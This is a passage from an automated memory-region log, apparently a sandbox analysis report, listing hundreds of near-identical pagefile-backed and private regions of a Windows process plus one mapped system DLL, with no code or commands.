entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9499 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9500 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9501 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9502 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9503 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9504 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9505 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9506 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9507 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9508 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9509 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9510 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9511 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9512 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9513 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9514 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9515 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9516 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9517 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9518 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9519 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9520 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9521 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9522 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9523 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9524 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9525 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9526 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9527 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9528 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9529 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9530 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9531 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9532 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9533 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 9534 start_va = 0x4120000 end_va = 0x413dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 9535 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9536 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9537 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9538 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9539 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9540 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9541 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9542 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9543 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9544 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9545 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9546 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9547 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9548 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9549 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9550 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9551 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9552 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9553 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9554 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9555 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9556 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9557 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9558 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9559 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9560 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9561 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9562 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9563 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9564 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9565 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9566 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9567 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9568 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9569 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9570 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9571 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9572 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9573 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9574 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9575 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9576 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9577 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9578 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9579 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9580 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9581 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9582 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9583 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9584 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9585 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9586 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9587 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9588 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9589 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9590 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9591 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9592 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9593 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9594 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9595 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9596 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9597 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9598 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9599 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9600 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9601 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9602 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9603 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9604 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9605 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9606 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9607 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9608 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9609 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9610 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9611 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9612 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9613 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9614 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9615 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9616 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9617 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9618 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9619 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9620 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9621 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9622 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9623 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9624 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9625 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9626 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9627 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9628 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9629 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9630 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9631 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9632 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9633 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9634 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9635 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9636 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9637 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9638 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9639 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9640 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9641 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 9642 start_va = 0x4120000 end_va = 0x413dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 9643 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9644 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9645 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9646 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9647 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9648 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9649 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9650 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9651 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9652 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9653 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9654 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9655 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9656 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9657 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9658 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9659 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9660 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9661 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9662 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9663 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9664 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9665 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9666 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9667 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9668 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9669 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9670 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9671 start_va = 0x7ffb1c940000 end_va = 0x7ffb1c9e2fff monitored = 0 entry_point = 0x7ffb1c954810 region_type = mapped_file name = "wpnapps.dll" filename = "\\Windows\\System32\\wpnapps.dll" (normalized: "c:\\windows\\system32\\wpnapps.dll") Region: id = 9672 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9673 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9674 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9675 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9676 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9677 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9678 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9679 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9680 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9681 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9682 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9683 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9684 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9685 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 